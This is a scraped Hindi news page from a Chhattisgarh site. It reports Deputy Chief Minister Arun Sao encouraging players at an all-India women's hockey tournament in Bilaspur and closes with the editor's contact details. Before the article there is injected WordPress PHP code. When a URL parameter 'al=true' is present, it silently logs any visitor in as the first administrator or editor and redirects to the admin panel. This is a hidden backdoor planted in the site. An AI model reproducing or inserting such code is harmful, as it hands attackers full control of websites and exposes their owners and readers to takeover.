// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); उप मुख्यमंत्री अरुण साव ऑल इण्डिया महिला हॉकी प्रतियोगिता के आयोजन में हुए शामिल – प्रत्युषा आशा की नयी किरण
छत्तीसगढ़

उप मुख्यमंत्री अरुण साव ऑल इण्डिया महिला हॉकी प्रतियोगिता के आयोजन में हुए शामिल

रायपुर (IMNB)। उप मुख्यमंत्री श्री अरुण साव ने आज बिलासपुर के बहतराई खेल मैदान में आयोजित ऑल इंडिया महिला हॉकी प्रतियोगिता में पहुंचकर खिलाडियों का उत्साहवर्धन किया। एसईसीएल (South Eastern Coalfields Limited) और नवभारत समाचार पत्र द्वारा 7 मार्च से 12 मार्च तक इस पांच दिवसीय प्रतियोगिता का आयोजन किया गया है। उप मुख्यमंत्री श्री साव ने कार्यक्रम में कहा कि हॉकी देश का राष्ट्रीय खेल है और भारत की पहचान है। नवभारत समाचार पत्र के सामाजिक सरोकार की यह पहल प्रशंसनीय है। इस प्रतियोगिता में छत्तीसगढ़ के साथ ही कई राज्यों की महिला खिलाड़ियों को भागीदारी का अवसर मिला है। उन्होंने कहा कि राज्य शासन खेल और खिलाड़ियों को बढ़ावा देने के लिए प्रतिबद्ध है। प्रदेश में खेलों के विकास के लिए निरंतर कार्य किए जा रहे हैं। गांवों में भी खेलों के लिए प्रशिक्षण केंद्र खोले जा रहे हैं।
बिलासपुर में आयोजित इस ऑल इंडिया महिला हॉकी प्रतियोगिता में राजस्थान, ओड़िशा, छत्तीसगढ़, मध्यप्रदेश और उत्तरप्रदेश की राष्ट्रीय खिलाड़ी शिरकत कर रही हैं। इसमें सात राज्यों के 250 खिलाड़ी हिस्सा ले रहे हैं। प्रतियोगिता का फाइनल मैच 12 मार्च को खेला जाएगा। विधायक श्री अटल श्रीवास्तव, हॉकी संघ के जिला अध्यक्ष श्री रोहित वाजपेई, हॉकी एसोसिएशन के महासचिव श्री मनीष श्रीवास्तव, पूर्व महापौर श्री किशोर राय, श्री सुजीत बोस और श्री मलय भट्टाचार्य सहित बड़ी संख्या में खेल प्रेमी कार्यक्रम में मौजूद थे।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]